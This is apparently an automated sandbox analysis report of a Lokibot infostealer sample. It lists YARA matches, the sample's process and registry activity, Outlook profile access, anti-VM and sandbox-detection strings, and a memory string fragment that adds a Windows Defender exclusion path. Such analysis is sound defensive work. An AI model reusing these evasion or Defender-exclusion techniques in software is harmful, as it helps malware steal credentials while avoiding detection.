                Source: 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.2.FJbeidnZOF.exe.2592e78.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-03-09
                Source: 1.2.FJbeidnZOF.exe.2592e78.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.2.FJbeidnZOF.exe.2592e78.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.FJbeidnZOF.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 5.2.FJbeidnZOF.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.2.FJbeidnZOF.exe.37167b0.2.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-03-09
                Source: 1.2.FJbeidnZOF.exe.37167b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.2.FJbeidnZOF.exe.37167b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.2.FJbeidnZOF.exe.37167b0.2.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-03-09
                Source: 1.2.FJbeidnZOF.exe.37167b0.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.2.FJbeidnZOF.exe.37167b0.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.FJbeidnZOF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 5.2.FJbeidnZOF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: FJbeidnZOF.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@81/2
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeCode function: 5_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,5_2_0040650A
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeCode function: 5_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,5_2_0040434D
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FJbeidnZOF.exe.logJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                Source: FJbeidnZOF.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
                Source: FJbeidnZOF.exeVirustotal: Detection: 22%
                Source: FJbeidnZOF.exeReversingLabs: Detection: 27%
                Source: FJbeidnZOF.exeString found in binary or memory: ble> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle
                Source: FJbeidnZOF.exeString found in binary or memory: ble> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle
                Source: FJbeidnZOF.exeString found in binary or memory: es>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvail
                Source: FJbeidnZOF.exeString found in binary or memory: es>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvail
                Source: unknownProcess created: C:\Users\user\Desktop\FJbeidnZOF.exe 'C:\Users\user\Desktop\FJbeidnZOF.exe'
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess created: C:\Users\user\Desktop\FJbeidnZOF.exe C:\Users\user\Desktop\FJbeidnZOF.exe
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess created: C:\Users\user\Desktop\FJbeidnZOF.exe C:\Users\user\Desktop\FJbeidnZOF.exeJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                Source: FJbeidnZOF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: FJbeidnZOF.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                Data Obfuscation:

                barindex
                Yara detected aPLib compressed binaryShow sources
                Source: Yara matchFile source: 00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: FJbeidnZOF.exe PID: 5472, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: FJbeidnZOF.exe PID: 5392, type: MEMORY
                Source: Yara matchFile source: 1.2.FJbeidnZOF.exe.2592e78.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.FJbeidnZOF.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.FJbeidnZOF.exe.37167b0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.FJbeidnZOF.exe.37167b0.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.FJbeidnZOF.exe.400000.0.unpack, type: UNPACKEDPE
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeCode function: 1_2_0701362E pushad ; retf 1_2_07013639
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeCode function: 5_2_00402AC0 push eax; ret 5_2_00402AD4
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeCode function: 5_2_00402AC0 push eax; ret 5_2_00402AFC
                Source: initial sampleStatic PE information: section name: .text entropy: 7.61153237798
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

                Malware Analysis System Evasion:

                barindex
                Yara detected AntiVM3Show sources
                Source: Yara matchFile source: 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: FJbeidnZOF.exe PID: 5392, type: MEMORY
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe TID: 5396Thread sleep time: -100468s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe TID: 672Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe TID: 5996Thread sleep time: -660000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeCode function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,5_2_00403D74
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeThread delayed: delay time: 100468Jump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeThread delayed: delay time: 60000Jump to behavior
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpBinary or memory string: vmware
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
